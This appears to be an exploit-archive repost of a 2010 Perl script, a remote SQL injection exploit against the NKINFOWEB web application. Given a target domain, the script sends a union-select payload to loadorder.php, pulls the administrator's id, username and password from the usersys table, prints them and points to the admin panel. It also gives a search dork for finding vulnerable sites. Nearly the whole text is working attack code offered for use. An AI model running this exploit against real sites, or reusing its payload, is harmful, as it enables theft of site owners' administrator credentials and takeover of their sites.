Home / os / win7

nkinfoweb-sql.txt

Posted on 24 April 2010

# Exploit Title: NKINFOWEB SQL INJECTION EXPLOIT # Date: 23/04/2010 # Author: d4rk-h4ck3r # Software Link: http://jaist.dl.sourceforge.net/project/nkinfoweb/FunctionNkinfoweb_v.species.rar # Tested on: several linux versions #=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ #!/usr/bin/perl use strict; use LWP::Simple; print " "; print "############################################################## "; print "# NKINFOWEB SQL INJECTION EXPLOIT # "; print "# Author: d4rk-h4ck3r (Tunisian Security Team) # "; print "# Greetz to Passeword & Maxilog & all vbspiders members # "; print "# Dork: Powered by NKINFOWEB VSp © 2009 # "; print "############################################################## "; my $domain = shift @ARGV or banner(); my $injsql ="/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--"; if(get($domain.$injsql) =~ /:::(.+):(.+):(.+):::/) { print " [+] Exploit Succesfull!"; print " [+] Admin id: : $1"; print " [+] Admin username: $2"; print " [+] Admin password: $3"; print " [+] Admin panel: $domain/administrator/ ";} else { print "[!] Exploit Failed! "; print "[!] Site Not Vulnerable! "; } sub banner { print "[+] NKINFOWEB <= Remote SQL Injection Exploit "; print "[+] Usage: ${0} http://[host] "; return exit; } _________________________________________________________________ Consultez vos emails Orange, Gmail, Yahoo!, Free ... directement depuis HOTMAIL ! http://www.windowslive.fr/hotmail/agregation/

 

TOP